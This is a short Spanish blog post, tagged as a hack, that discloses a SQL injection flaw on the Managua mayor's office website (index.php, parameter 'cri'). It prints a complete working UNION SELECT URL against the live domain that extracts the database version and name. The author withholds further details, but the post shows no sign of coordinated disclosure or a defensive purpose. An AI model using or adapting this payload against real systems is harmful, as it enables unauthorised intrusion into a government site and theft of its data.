[hack] iSQL en sitio web de Alcaldía de Managua

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
index.php                                    cri

Detalles:  Con solo inyectar ' en la url mencionada y no muestra 

información sin mostrar error, pero al probar la inyección se 

obtienen los datos. 

Ejemplo: 

http://www.managua.gob.ni/index.php?s=3005&cri=3%20UNION%20SELECT%201,version%28%29,3,4,database%28%29--

Sin más detalles para evitar el abuso de Script kiddies.

Posted in: hacks